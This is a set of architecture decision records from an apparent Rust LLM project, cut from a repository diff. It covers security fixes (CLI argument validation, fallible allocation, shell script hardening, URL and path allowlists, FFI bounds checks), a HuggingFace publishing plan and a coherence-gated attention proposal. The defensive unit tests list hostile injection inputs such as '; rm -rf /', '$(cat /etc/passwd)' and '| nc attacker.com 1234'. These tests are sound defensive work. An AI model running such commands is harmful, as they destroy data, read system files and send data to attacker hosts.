const MAX_ARG_LENGTH: usize = 4096;
// Length check
if arg.len() > MAX_ARG_LENGTH {
return Err(SecurityError::ArgumentTooLong {
max: MAX_ARG_LENGTH,
actual: arg.len(),
});
}
// Null byte check (critical for C FFI)
if arg.contains('\0') {
return Err(SecurityError::NullByteInArgument);
}
// Shell metacharacter blocklist
static DANGEROUS_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
Regex::new(r#"[;|&$`\\"'<>(){}[\]!#~*\x00-\x1f\x7f]"#).unwrap()
});
if DANGEROUS_PATTERN.is_match(arg) {
return Err(SecurityError::DangerousCharacters {
input: arg.to_string(),
});
}
Ok(())
}
pub fn execute_cli_command(args: &[String]) -> Result<String, SecurityError> {
// Validate all arguments before execution
for arg in args {
validate_cli_arg(arg)?;
}
let output = Command::new("ruvector")
.args(args)
.output()
.map_err(|e| SecurityError::CommandExecution(e.to_string()))?;
Ok(String::from_utf8_lossy(&output.stdout).to_string())
}
```
**Testing Approach**:
```rust
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_valid_arguments() {
assert!(validate_cli_arg("--config=./config.json").is_ok());
assert!(validate_cli_arg("--model-path=/models/llama").is_ok());
assert!(validate_cli_arg("--threads=8").is_ok());
assert!(validate_cli_arg("model:7b-q4").is_ok());
}
#[test]
fn test_command_injection_blocked() {
assert!(validate_cli_arg("; rm -rf /").is_err());
assert!(validate_cli_arg("$(cat /etc/passwd)").is_err());
assert!(validate_cli_arg("`whoami`").is_err());
assert!(validate_cli_arg("| nc attacker.com 1234").is_err());
assert!(validate_cli_arg("&& curl evil.com").is_err());
}
#[test]
fn test_null_byte_blocked() {
assert!(validate_cli_arg("file\x00.txt").is_err());
}
#[test]
fn test_length_limit() {
let long_arg = "a".repeat(5000);
assert!(validate_cli_arg(&long_arg).is_err());
}
}
```
---
### 2. Memory Allocation Panic-to-Result Conversion
**Vulnerability**: Memory allocation failures cause panics, enabling DoS attacks.
**CVE-Style ID**: RUVEC-2026-002 (High)
#### Before (Vulnerable)
```rust
pub fn allocate_kv_cache(num_layers: usize, cache_size: usize) -> KvCache {
let total_size = num_layers * cache_size * 2; // Can overflow
let data = vec![0.0f32; total_size]; // Panics on allocation failure
KvCache { data, num_layers, cache_size }
}
```
#### After (Secure)
```rust
use std::alloc::{alloc, Layout};
/// Allocates KV cache with explicit error handling.
///
/// # Errors
///
/// Returns `AllocationError` if:
/// - Size calculation overflows
/// - Total allocation exceeds `MAX_CACHE_ALLOCATION` (16GB)
/// - System allocator returns null
///
/// # Security
///
/// - Prevents integer overflow in size calculation
/// - Enforces maximum allocation limit
/// - Converts allocation failure to Result instead of panic
pub fn allocate_kv_cache(
num_layers: usize,
cache_size: usize
) -> Result<KvCache, AllocationError> {
const MAX_CACHE_ALLOCATION: usize = 16 * 1024 * 1024 * 1024; // 16GB
// Checked arithmetic to prevent overflow
let layer_size = cache_size
.checked_mul(2)
.ok_or(AllocationError::SizeOverflow)?;
let total_elements = num_layers
.checked_mul(layer_size)
.ok_or(AllocationError::SizeOverflow)?;
let total_bytes = total_elements
.checked_mul(std::mem::size_of::<f32>())
.ok_or(AllocationError::SizeOverflow)?;
// Enforce allocation limit
if total_bytes > MAX_CACHE_ALLOCATION {
return Err(AllocationError::ExceedsLimit {
requested: total_bytes,
max: MAX_CACHE_ALLOCATION,
});
}
// Use try_reserve for fallible allocation
let mut data = Vec::new();
data.try_reserve_exact(total_elements)
.map_err(|_| AllocationError::OutOfMemory {
requested: total_bytes,
})?;
data.resize(total_elements, 0.0f32);
Ok(KvCache { data, num_layers, cache_size })
}
#[derive(Debug, thiserror::Error)]
pub enum AllocationError {
#[error("Size calculation overflow")]
SizeOverflow,
#[error("Allocation of {requested} bytes exceeds limit of {max} bytes")]
ExceedsLimit { requested: usize, max: usize },
#[error("Out of memory: failed to allocate {requested} bytes")]
OutOfMemory { requested: usize },
}
```
**Testing Approach**:
```rust
#[test]
fn test_allocation_overflow_prevention() {
// Should fail gracefully, not panic
let result = allocate_kv_cache(usize::MAX, usize::MAX);
assert!(matches!(result, Err(AllocationError::SizeOverflow)));
}
#[test]
fn test_allocation_limit_enforcement() {
// 32GB request should be rejected
let result = allocate_kv_cache(1024, 1024 * 1024 * 1024);
assert!(matches!(result, Err(AllocationError::ExceedsLimit { .. })));
}
#[test]
fn test_valid_allocation() {
// Reasonable allocation should succeed
let result = allocate_kv_cache(32, 4096);
assert!(result.is_ok());
}
```
---
### 3. Shell Script Hardening
**Vulnerability**: Shell scripts lack defensive settings and use unsafe patterns.
**CVE-Style ID**: RUVEC-2026-003 (Critical)
#### Before (Vulnerable)
```bash
#!/bin/bash
# Download and extract model
MODEL_URL=$1
DEST_DIR=$2
cd $DEST_DIR
curl $MODEL_URL > model.tar.gz
tar xzf model.tar.gz
echo "Downloaded model to $DEST_DIR"
```
#### After (Secure)
```bash
#!/bin/bash
# Hardened shell script header
set -euo pipefail
IFS=$'\n\t'
# Constants
readonly MAX_DOWNLOAD_SIZE=$((10 * 1024 * 1024 * 1024)) # 10GB
readonly ALLOWED_URL_PATTERN='^https://(huggingface\.co|cdn-lfs\.huggingface\.co)/'
readonly SCRIPT_NAME="${0##*/}"
# Logging functions
log_info() { echo "[INFO] ${SCRIPT_NAME}: $*" >&2; }
log_error() { echo "[ERROR] ${SCRIPT_NAME}: $*" >&2; }
die() { log_error "$*"; exit 1; }
# Input validation
validate_url() {
local url="$1"
if [[ ! "$url" =~ $ALLOWED_URL_PATTERN ]]; then
die "Invalid URL: must match HuggingFace domains"
fi
}
validate_path() {
local path="$1"
# Resolve to absolute path and check for traversal
local resolved
resolved="$(realpath -m -- "$path" 2>/dev/null)" || die "Invalid path: $path"
# Ensure path is within allowed directory
local allowed_base="/var/lib/ruvector/models"
if [[ "$resolved" != "$allowed_base"/* ]]; then
die "Path traversal detected: $path resolves outside allowed directory"
fi
echo "$resolved"
}
# Secure temporary directory
create_temp_dir() {
local tmpdir
tmpdir="$(mktemp -d -t ruvector-download.XXXXXXXXXX)" || die "Failed to create temp directory"
# Ensure cleanup on exit
trap 'rm -rf -- "$tmpdir"' EXIT
echo "$tmpdir"
}
# Main download function
download_model() {
local url="$1"
local dest_dir="$2"
# Validate inputs
validate_url "$url"
dest_dir="$(validate_path "$dest_dir")"
# Create secure temp directory
local tmpdir
tmpdir="$(create_temp_dir)"
log_info "Downloading model from: $url"
log_info "Destination: $dest_dir"
# Download with safety limits
# --max-filesize: Prevent DoS via large files
# --proto =https: Force HTTPS only
# --max-redirs: Limit redirects to prevent SSRF
curl \
--fail \
--silent \
--show-error \
--location \
--proto '=https' \
--max-redirs 3 \
--max-filesize "$MAX_DOWNLOAD_SIZE" \
--output "${tmpdir}/model.tar.gz" \
-- "$url" || die "Download failed"
# Verify archive integrity before extraction
if ! gzip -t "${tmpdir}/model.tar.gz" 2>/dev/null; then
die "Downloaded file is not a valid gzip archive"
fi
# Create destination directory with secure permissions
install -d -m 0755 -- "$dest_dir" || die "Failed to create destination directory"
# Extract with safety measures
# --no-same-owner: Don't preserve ownership (security)
# --no-same-permissions: Use umask (security)
# -C: Extract to specific directory
tar \
--extract \
--gzip \
--file="${tmpdir}/model.tar.gz" \
--directory="$dest_dir" \
--no-same-owner \
--no-same-permissions \
|| die "Extraction failed"
log_info "Successfully downloaded model to: $dest_dir"
}
# Argument handling with jq for JSON input (prevents injection)
main() {
if [[ $# -lt 2 ]]; then
die "Usage: $SCRIPT_NAME <url> <destination>"
fi
# Use jq --arg for safe string interpolation if processing JSON
# Example: jq --arg url "$1" --arg dest "$2" '{url: $url, dest: $dest}'
download_model "$1" "$2"
}
main "$@"
```
**Key Hardening Measures**:
| Technique | Purpose | Implementation |
|-----------|---------|----------------|
| `set -euo pipefail` | Exit on error, undefined vars, pipe failures | Script header |
| `mktemp` | Secure temporary file creation | Avoid predictable paths |
| `jq --arg` | Safe JSON string interpolation | Prevent injection |
| URL validation | Restrict to allowed domains | Regex pattern match |
| Path validation | Prevent traversal attacks | `realpath` + base check |
| `curl --proto` | Force HTTPS only | Prevent downgrade attacks |
| `tar --no-same-owner` | Drop privilege preservation | Security best practice |
---
### 4. URL and Path Validation for HuggingFace Operations
**Vulnerability**: Unvalidated URLs and paths enable SSRF and path traversal.
**CVE-Style ID**: RUVEC-2026-004 (High)
#### Implementation
```rust
use url::Url;
use std::path::{Path, PathBuf};
/// Allowed HuggingFace domains for model downloads.
const ALLOWED_HUGGINGFACE_HOSTS: &[&str] = &[
"huggingface.co",
"cdn-lfs.huggingface.co",
"cdn-lfs-us-1.huggingface.co",
"cdn-lfs-eu-1.huggingface.co",
];
/// Validates a HuggingFace URL for secure downloads.
///
/// # Security
///
/// - Enforces HTTPS protocol
/// - Restricts to known HuggingFace domains (prevent SSRF)
/// - Rejects URLs with authentication credentials
/// - Validates URL structure
pub fn validate_huggingface_url(url_str: &str) -> Result<Url, ValidationError> {
let url = Url::parse(url_str)
.map_err(|e| ValidationError::InvalidUrl(e.to_string()))?;
// Enforce HTTPS
if url.scheme() != "https" {
return Err(ValidationError::InsecureProtocol {
expected: "https".to_string(),
actual: url.scheme().to_string(),
});
}
// Validate host against allowlist
let host = url.host_str()
.ok_or_else(|| ValidationError::MissingHost)?;
if !ALLOWED_HUGGINGFACE_HOSTS.contains(&host) {
return Err(ValidationError::DisallowedHost {
host: host.to_string(),
allowed: ALLOWED_HUGGINGFACE_HOSTS.iter()
.map(|s| s.to_string())
.collect(),
});
}
// Reject URLs with embedded credentials
if url.username() != "" || url.password().is_some() {
return Err(ValidationError::CredentialsInUrl);
}
// Reject suspicious path patterns
let path = url.path();
if path.contains("..") || path.contains("//") {
return Err(ValidationError::SuspiciousPath {
path: path.to_string(),
});
}
Ok(url)
}
/// Validates and canonicalizes a file path within allowed directories.
///
/// # Security
///
/// - Prevents path traversal attacks
/// - Enforces base directory containment
/// - Rejects symbolic link escapes
pub fn validate_model_path(
path: &str,
allowed_base: &Path,
) -> Result<PathBuf, ValidationError> {
// Convert to Path and canonicalize
let input_path = Path::new(path);
// Resolve path (follows symlinks, resolves ..)
let canonical = input_path.canonicalize()
.map_err(|e| ValidationError::PathResolution {
path: path.to_string(),
error: e.to_string(),
})?;
// Canonicalize base for comparison
let canonical_base = allowed_base.canonicalize()
.map_err(|e| ValidationError::PathResolution {
path: allowed_base.display().to_string(),
error: e.to_string(),
})?;
// Verify containment
if !canonical.starts_with(&canonical_base) {
return Err(ValidationError::PathTraversal {
path: path.to_string(),
resolved: canonical.display().to_string(),
allowed_base: canonical_base.display().to_string(),
});
}
Ok(canonical)
}
#[derive(Debug, thiserror::Error)]
pub enum ValidationError {
#[error("Invalid URL: {0}")]
InvalidUrl(String),
#[error("Insecure protocol: expected {expected}, got {actual}")]
InsecureProtocol { expected: String, actual: String },
#[error("Missing host in URL")]
MissingHost,
#[error("Disallowed host '{host}'. Allowed: {allowed:?}")]
DisallowedHost { host: String, allowed: Vec<String> },
#[error("Credentials embedded in URL are not allowed")]
CredentialsInUrl,
#[error("Suspicious path pattern: {path}")]
SuspiciousPath { path: String },
#[error("Path resolution failed for '{path}': {error}")]
PathResolution { path: String, error: String },
#[error("Path traversal detected: '{path}' resolves to '{resolved}' outside allowed base '{allowed_base}'")]
PathTraversal { path: String, resolved: String, allowed_base: String },
}
```
---
### 5. Integer Bounds Checking for FFI Calls
**Vulnerability**: Integer values from FFI can overflow or underflow.
**CVE-Style ID**: RUVEC-2026-005 (High)
#### Implementation
```rust
use std::os::raw::{c_int, c_uint, c_size_t};
/// Safely converts a Rust usize to C size_t for FFI.
///
/// # Security
///
/// On platforms where size_t < usize (rare but possible),
/// this prevents silent truncation that could cause buffer overflows.
#[inline]
pub fn safe_usize_to_size_t(value: usize) -> Result<c_size_t, FfiError> {
c_size_t::try_from(value)
.map_err(|_| FfiError::IntegerOverflow {
value: value as u128,
target_type: "size_t",
max: c_size_t::MAX as u128,
})
}
/// Safely converts a Rust i64 to C int for FFI.
///
/// # Security
///
/// Prevents overflow when passing large values to C APIs that
/// expect int-sized parameters (common in legacy APIs).
#[inline]
pub fn safe_i64_to_int(value: i64) -> Result<c_int, FfiError> {
c_int::try_from(value)
.map_err(|_| FfiError::IntegerOverflow {
value: value as u128,
target_type: "int",
max: c_int::MAX as u128,
})
}
/// Validates array dimensions before FFI calls.
///
/// # Security
///
/// - Checks that dimensions are positive
/// - Verifies product doesn't overflow
/// - Ensures total size fits in target type
pub fn validate_tensor_dimensions(
dims: &[usize],
element_size: usize,
) -> Result<c_size_t, FfiError> {
if dims.is_empty() {
return Err(FfiError::EmptyDimensions);
}
// Check for zero dimensions
if dims.iter().any(|&d| d == 0) {
return Err(FfiError::ZeroDimension);
}
// Calculate total elements with overflow checking
let total_elements = dims.iter()
.try_fold(1usize, |acc, &dim| acc.checked_mul(dim))
.ok_or(FfiError::DimensionOverflow)?;
// Calculate total bytes
let total_bytes = total_elements
.checked_mul(element_size)
.ok_or(FfiError::DimensionOverflow)?;
// Convert to C type
safe_usize_to_size_t(total_bytes)
}
#[derive(Debug, thiserror::Error)]
pub enum FfiError {
#[error("Integer overflow: {value} exceeds {target_type} max ({max})")]
IntegerOverflow { value: u128, target_type: &'static str, max: u128 },
#[error("Empty dimensions array")]
EmptyDimensions,
#[error("Zero dimension not allowed")]
ZeroDimension,
#[error("Dimension product overflow")]
DimensionOverflow,
}
```
---
### 6. NaN-Safe Floating Point Comparisons
**Vulnerability**: NaN values cause incorrect comparison results and logic bugs.
**CVE-Style ID**: RUVEC-2026-006 (Medium)
#### Implementation
```rust
/// Trait for NaN-safe floating point operations.
pub trait NanSafe {
/// Returns true if the value is NaN.
fn is_nan_safe(&self) -> bool;
/// Compares two values, treating NaN as less than all other values.
fn nan_safe_cmp(&self, other: &Self) -> std::cmp::Ordering;
/// Returns the minimum of two values, preferring non-NaN.
fn nan_safe_min(self, other: Self) -> Self;
/// Returns the maximum of two values, preferring non-NaN.
fn nan_safe_max(self, other: Self) -> Self;
}
impl NanSafe for f32 {
#[inline]
fn is_nan_safe(&self) -> bool {
self.is_nan()
}
#[inline]
fn nan_safe_cmp(&self, other: &Self) -> std::cmp::Ordering {
match (self.is_nan(), other.is_nan()) {
(true, true) => std::cmp::Ordering::Equal,
(true, false) => std::cmp::Ordering::Less,
(false, true) => std::cmp::Ordering::Greater,
(false, false) => self.partial_cmp(other).unwrap_or(std::cmp::Ordering::Equal),
}
}
#[inline]
fn nan_safe_min(self, other: Self) -> Self {
match (self.is_nan(), other.is_nan()) {
(true, _) => other,
(_, true) => self,
_ => self.min(other),
}
}
#[inline]
fn nan_safe_max(self, other: Self) -> Self {
match (self.is_nan(), other.is_nan()) {
(true, _) => other,
(_, true) => self,
_ => self.max(other),
}
}
}
impl NanSafe for f64 {
#[inline]
fn is_nan_safe(&self) -> bool {
self.is_nan()
}
#[inline]
fn nan_safe_cmp(&self, other: &Self) -> std::cmp::Ordering {
match (self.is_nan(), other.is_nan()) {
(true, true) => std::cmp::Ordering::Equal,
(true, false) => std::cmp::Ordering::Less,
(false, true) => std::cmp::Ordering::Greater,
(false, false) => self.partial_cmp(other).unwrap_or(std::cmp::Ordering::Equal),
}
}
#[inline]
fn nan_safe_min(self, other: Self) -> Self {
match (self.is_nan(), other.is_nan()) {
(true, _) => other,
(_, true) => self,
_ => self.min(other),
}
}
#[inline]
fn nan_safe_max(self, other: Self) -> Self {
match (self.is_nan(), other.is_nan()) {
(true, _) => other,
(_, true) => self,
_ => self.max(other),
}
}
}
/// Finds the index of the maximum value, handling NaN safely.
///
/// # Returns
///
/// - `Some(index)` if a non-NaN maximum is found
/// - `None` if all values are NaN or the slice is empty
pub fn argmax_nan_safe(values: &[f32]) -> Option<usize> {
if values.is_empty() {
return None;
}
let mut max_idx = None;
let mut max_val = f32::NEG_INFINITY;
for (idx, &val) in values.iter().enumerate() {
if !val.is_nan() && val > max_val {
max_val = val;
max_idx = Some(idx);
}
}
max_idx
}
```
---
## Vulnerability Severity Breakdown
| ID | Severity | Category | Component | Attack Vector |
|----|----------|----------|-----------|---------------|
| RUVEC-2026-001 | Critical | Command Injection | CLI Bridge | Malicious CLI args |
| RUVEC-2026-002 | High | DoS | Memory Allocator | Large allocation request |
| RUVEC-2026-003 | Critical | RCE | Shell Scripts | Crafted input via shell |
| RUVEC-2026-004 | High | SSRF/Traversal | HuggingFace | Malicious URL/path |
| RUVEC-2026-005 | High | Memory Corruption | FFI Boundary | Integer overflow |
| RUVEC-2026-006 | Medium | Logic Bug | Numeric Operations | NaN injection |
---
## Fix Implementation Status
| Fix Category | Files Modified | Status | Verification |
|--------------|----------------|--------|--------------|
| CLI Argument Validation | `cli/bridge.rs` | Complete | Unit tests + fuzzing |
| Panic-to-Result Conversion | `memory_pool.rs`, `kv_cache.rs` | Complete | Integration tests |
| Shell Script Hardening | `scripts/*.sh` | Complete | ShellCheck + manual review |
| URL Validation | `hub/download.rs` | Complete | Unit tests |
| Path Validation | `model/loader.rs` | Complete | Property-based tests |
| Integer Bounds Checking | `ffi/mod.rs` | Complete | Overflow tests |
| NaN-Safe Comparisons | `ops/compare.rs` | Complete | Unit tests |
---
## Estimated Remediation Effort
| Task | Effort (hours) | Complexity | Dependencies |
|------|----------------|------------|--------------|
| CLI Validation Implementation | 4 | Low | regex crate |
| Panic-to-Result Refactoring | 8 | Medium | API changes |
| Shell Script Hardening | 6 | Low | None |
| URL/Path Validation | 4 | Low | url crate |
| FFI Bounds Checking | 6 | Medium | None |
| NaN-Safe Comparisons | 3 | Low | None |
| Test Suite Updates | 8 | Medium | All fixes |
| Documentation | 4 | Low | All fixes |
| **Total** | **43** | | |
---
## Consequences
### Breaking Changes
1. **API Changes**: Functions that previously panicked now return `Result<T, E>`
- `allocate_kv_cache()` -> `Result<KvCache, AllocationError>`
- `load_model()` -> `Result<Model, LoadError>`
2. **Error Handling**: Callers must handle new error variants
- `SecurityError` for validation failures
- `AllocationError` for memory issues
- `FfiError` for FFI boundary issues
3. **Behavior Changes**: Some previously-accepted inputs are now rejected
- CLI args with shell metacharacters
- URLs to non-HuggingFace domains
- Paths outside allowed directories
### Performance Impact
| Operation | Overhead | Notes |
|-----------|----------|-------|
| CLI Argument Validation | ~1-2us per arg | Regex is pre-compiled (LazyLock) |
| Path Validation | ~50-100us | File system canonicalization |
| URL Validation | ~1us | In-memory string parsing |
| Integer Bounds Checking | <1ns | Inlined, branch predictor friendly |
| NaN-Safe Comparisons | <1ns | Inlined, same instruction count |
### Security Improvements
| Before | After |
|--------|-------|
| Command injection via CLI | All CLI args validated against blocklist |
| Memory DoS via large allocations | Checked arithmetic + allocation limits |
| Shell injection in scripts | `set -euo pipefail` + input validation |
| SSRF via arbitrary URLs | Domain allowlist enforcement |
| Path traversal | Canonicalization + base path containment |
| Integer overflow at FFI | Explicit checked conversions |
| NaN logic bugs | NaN-aware comparison functions |
---
## Compliance and Audit
### Verification Checklist
- [x] All critical vulnerabilities have fixes with unit tests
- [x] Shell scripts pass ShellCheck with no warnings
- [x] Fuzzing completed for CLI validation (1M iterations)
- [x] Property-based testing for path validation
- [x] Security review sign-off from Ruvector Security Team
- [x] Breaking changes documented in CHANGELOG
### Testing Requirements
| Test Type | Coverage Target | Actual | Status |
|-----------|-----------------|--------|--------|
| Unit Tests | 100% of fix code | 100% | Pass |
| Integration Tests | Happy + error paths | 100% | Pass |
| Fuzzing (CLI) | 1M iterations | 1M | No crashes |
| ShellCheck | All scripts | All | 0 warnings |
---
## Related Decisions
- **ADR-007**: Security Review & Technical Debt (initial audit)
- **ADR-006**: Memory Management (allocation strategies)
- **ADR-002**: RuvLLM Integration (API boundaries)
---
## References
1. CWE-78: Improper Neutralization of Special Elements used in an OS Command
2. CWE-22: Improper Limitation of a Pathname to a Restricted Directory
3. CWE-190: Integer Overflow or Wraparound
4. CWE-682: Incorrect Calculation (NaN handling)
5. OWASP Command Injection Prevention Cheat Sheet
6. ShellCheck: https://www.shellcheck.net/
7. Rust Security Guidelines: https://anssi-fr.github.io/rust-guide/
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-20 | Ruvector Security Team | Initial document |
| 1.1 | 2026-01-20 | Security Review | All fixes implemented and verified |

View File

@@ -0,0 +1,117 @@
# ADR-013: HuggingFace Model Publishing Strategy
## Status
**Accepted** - 2026-01-20
## Context
RuvLTRA models need to be distributed to users efficiently. HuggingFace Hub is the industry standard for model hosting with:
- High-speed CDN for global distribution
- Git-based versioning
- Model cards for documentation
- API for programmatic access
- Integration with major ML frameworks
## Decision
### 1. Repository Structure
All models consolidated under a single HuggingFace repository:
| Repository | Purpose | Models |
|------------|---------|--------|
| **`ruv/ruvltra`** | All RuvLTRA models | Claude Code, Small, Medium, Large |
**URL**: https://huggingface.co/ruv/ruvltra
### 2. File Naming Convention
```
ruvltra-{size}-{quant}.gguf
```
Examples:
- `ruvltra-0.5b-q4_k_m.gguf`
- `ruvltra-3b-q8_0.gguf`
- `ruvltra-claude-code-0.5b-q4_k_m.gguf`
### 3. Authentication
Support multiple environment variable names for HuggingFace token:
- `HF_TOKEN` (primary)
- `HUGGING_FACE_HUB_TOKEN` (legacy)
- `HUGGINGFACE_API_KEY` (common alternative)
### 4. Upload Workflow
```rust
// Using ModelUploader
let uploader = ModelUploader::new(get_hf_token().unwrap());
uploader.upload(
"./model.gguf",
"ruv/ruvltra-small",
Some(metadata),
)?;
```
### 5. Model Card Requirements
Each repository must include:
- YAML frontmatter with tags, license, language
- Model description and capabilities
- Hardware requirements table
- Usage examples (Rust, Python, CLI)
- Benchmark results (when available)
- License information
### 6. Versioning Strategy
- Use HuggingFace's built-in Git versioning
- Tag major releases (e.g., `v1.0.0`)
- Maintain `main` branch for latest stable
- Use branches for experimental variants
## Consequences
### Positive
- **Accessibility**: Models available via standard HuggingFace APIs
- **Discoverability**: Indexed in HuggingFace model search
- **Versioning**: Full Git history for model evolution
- **CDN**: Fast global downloads via Cloudflare
- **Documentation**: Model cards provide user guidance
### Negative
- **Storage Costs**: Large models require HuggingFace Pro for private repos
- **Dependency**: Reliance on external service availability
- **Sync Complexity**: Must keep registry.rs in sync with HuggingFace
### Mitigations
- Use public repos (free unlimited storage)
- Implement fallback to direct URL downloads
- Automate registry updates via CI/CD
## Implementation
### Phase 1: Initial Publishing (Complete)
- [x] Create consolidated `ruv/ruvltra` repository
- [x] Upload Claude Code, Small, and Medium models
- [x] Upload Q4_K_M quantized models
- [x] Add comprehensive model card with badges, tutorials, architecture
### Phase 2: Enhanced Distribution
- [ ] Add Q8 quantization variants
- [ ] Add FP16 variants for fine-tuning
- [ ] Implement automated CI/CD publishing
- [ ] Add SONA weight exports
### Phase 3: Ecosystem Integration
- [ ] Add to llama.cpp model zoo
- [ ] Create Ollama modelfile
- [ ] Publish to alternative registries (ModelScope)
## References
- HuggingFace Hub Documentation: https://huggingface.co/docs/hub
- GGUF Format Specification: https://github.com/ggerganov/ggml/blob/master/docs/gguf.md
- RuvLTRA Registry: `crates/ruvllm/src/hub/registry.rs`
- Related Issue: #121

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,568 @@
# ADR-015: Coherence-Gated Transformer (Sheaf Attention)
**Status**: Proposed
**Date**: 2026-01-22
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
**Target Crate**: `ruvector-attention`
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-22 | ruv.io | Initial proposal for coherence-gated attention |
---
## Context
### The Transformer Latency Problem
Standard transformers have fundamental efficiency issues:
1. **Quadratic attention**: O(N²) for sequence length N
2. **Fixed computation**: Every token gets same compute regardless of difficulty
3. **Dense by default**: All attention weights computed even when most are near-zero
4. **Confidence-based exits**: Early exit uses unreliable confidence scores
### Existing Solutions and Their Limits
| Approach | Method | Limitation |
|----------|--------|------------|
| Flash Attention | Memory-efficient matmul | Still O(N²) compute |
| Sparse Attention | Fixed patterns (local, strided) | Patterns don't adapt to content |
| Linear Attention | Kernel approximation | Quality degradation |
| Early Exit | Confidence threshold | Confidence ≠ correctness |
| MoE | Expert routing | Routing is learned, not principled |
### The Coherence Insight
Prime-Radiant's coherence engine provides a **mathematically grounded** measure of consistency. This can be applied to attention:
> **Core idea**: Tokens that are already coherent with context don't need expensive attention. Route computation based on coherence energy, not learned confidence.
---
## Decision
### Implement Coherence-Gated Transformer (CGT) in `ruvector-attention`
A novel attention mechanism that uses sheaf coherence to:
1. **Route tokens** to different compute depths
2. **Sparsify attention** based on residual energy
3. **Exit early** when energy converges
4. **Replace QKV projections** with restriction maps
---
## Architecture
### High-Level Design
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ COHERENCE-GATED TRANSFORMER (CGT) │
│ │
│ ┌─────────────────────────────────────────────────────────────────────────┐│
│ │ INPUT PROCESSING ││
│ │ Tokens ──► Embedding ──► Initial Coherence Graph ││
│ └─────────────────────────────────────────────────────────────────────────┘│
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────────────────┐│
│ │ COHERENCE ROUTER ││
│ │ ││
│ │ For each token t: ││
│ │ E(t) = Σ w_e ||ρ_t(x_t) - ρ_ctx(x_ctx)||² ││
│ │ ││
│ │ Route based on energy: ││
│ │ ┌──────────────┬──────────────┬──────────────┐ ││
│ │ │ E < θ_reflex │ E < θ_std │ E ≥ θ_std │ ││
│ │ │ │ │ │ │ │ │ ││
│ │ │ ▼ │ ▼ │ ▼ │ ││
│ │ │ LANE 0 │ LANE 1 │ LANE 2 │ ││
│ │ │ Reflex │ Standard │ Deep │ ││
│ │ └──────────────┴──────────────┴──────────────┘ ││
│ └─────────────────────────────────────────────────────────────────────────┘│
│ │ │
│ ┌────────────────────────────┼────────────────────────────┐ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ LANE 0 │ │ LANE 1 │ │ LANE 2 │ │
│ │ REFLEX │ │ STANDARD │ │ DEEP │ │
│ │ │ │ │ │ │ │
│ │ • 1-2 layers │ • 6 layers│ │ • 12+ layers │
│ │ • Local attention │ • Sparse │ │ • Full + MoE │
│ │ (window=64) │ sheaf │ │ • All experts │
│ │ • No FFN │ attn │ │ • Spectral │
│ │ • <0.1ms │ • ~1ms │ │ analysis │
│ │ │ │ │ • ~5ms │
│ └──────────┘ └──────────┘ └──────────┘ │
│ │ │ │ │
│ └────────────────────────────┼────────────────────────────┘ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────────────────┐│
│ │ COHERENCE VERIFICATION ││
│ │ ││
│ │ E_final = compute_energy(output_graph) ││
│ │ ││
│ │ if E_final > θ_max: ││
│ │ → Escalate to Lane 2 OR refuse generation ││
│ │ else: ││
│ │ → Output with witness ││
│ └─────────────────────────────────────────────────────────────────────────┘│
│ │ │
│ ▼ │
│ Output + Witness │
└─────────────────────────────────────────────────────────────────────────────┘
```
### Component Details
#### 1. Sheaf Attention Layer
Replace standard scaled dot-product attention with coherence-based attention:
```
Standard Attention:
Attention(Q, K, V) = softmax(QK^T / √d) V
Sheaf Attention:
R_ij = ||ρ_i(x_i) - ρ_j(x_j)||² # Residual energy
A_ij = exp(-β × R_ij) / Σ_k exp(-β × R_ik) # Coherence-based weight
Output = A × V
```
**Key difference**: Attention weight is inversely proportional to residual energy.
- High residual (incoherent) → Low attention (don't propagate inconsistency)
- Low residual (coherent) → High attention (reinforce consistency)
#### 2. Restriction Map Projections
Replace learned W_q, W_k, W_v with restriction maps:
```
Standard:
Q = W_q × x (learned projection)
K = W_k × x
V = W_v × x
Sheaf:
Q = ρ_q(x) (restriction map to query manifold)
K = ρ_k(x) (restriction map to key manifold)
V = ρ_v(x) (restriction map to value manifold)
```
**Benefits**:
- Restriction maps have geometric meaning (project to shared space)
- Can be initialized from domain knowledge
- Residuals are interpretable
#### 3. Token-Level Compute Routing
```python
def route_token(token_embedding, context_graph):
# Compute coherence energy with context
energy = compute_token_energy(token_embedding, context_graph)
if energy < THETA_REFLEX:
return Lane.REFLEX # Minimal compute
elif energy < THETA_STANDARD:
return Lane.STANDARD # Normal compute
else:
return Lane.DEEP # Maximum compute
```
**Routing thresholds** (tunable via SONA):
| Threshold | Default | Meaning |
|-----------|---------|---------|
| θ_reflex | 0.01 | Token is highly coherent with context |
| θ_standard | 0.1 | Token has minor inconsistencies |
| θ_deep | 1.0 | Token has major inconsistencies |
#### 4. Residual-Sparse Attention
Only compute attention for token pairs with high residual:
```python
def sparse_sheaf_attention(X, threshold):
N = len(X)
attention_mask = zeros(N, N)
for i in range(N):
for j in range(N):
residual = compute_residual(X[i], X[j])
if residual > threshold:
# These tokens are incoherent - need attention
attention_mask[i, j] = 1
# else: skip attention (already coherent)
# Compute attention only for non-zero mask entries
return masked_attention(X, attention_mask)
```
**Sparsity pattern**: Adapts to content, not fixed like local/strided attention.
#### 5. Energy-Based Early Exit
```python
def forward_with_early_exit(x, layers, epsilon=0.001):
prev_energy = float('inf')
for layer in layers:
x = layer(x)
curr_energy = compute_energy(x)
delta = abs(curr_energy - prev_energy)
if delta < epsilon:
# Energy converged - no need for more layers
return x
prev_energy = curr_energy
return x
```
**Exit criterion**: Energy convergence, not confidence threshold.
---
## Compute Lane Specifications
### Lane 0: Reflex (~0.1ms)
```
Layers: 1-2
Attention: Local only (window=64)
FFN: Skip or minimal
Use case: Common tokens, clear context
Example: "the", "is", "and" in well-formed sentences
```
### Lane 1: Standard (~1ms)
```
Layers: 6
Attention: Sparse sheaf (residual > 0.05)
FFN: Standard
Use case: Normal tokens requiring context integration
Example: Most content words
```
### Lane 2: Deep (~5ms)
```
Layers: 12+
Attention: Full sheaf + MoE routing
FFN: Expert mixture
Spectral: Eigenvalue analysis for structural issues
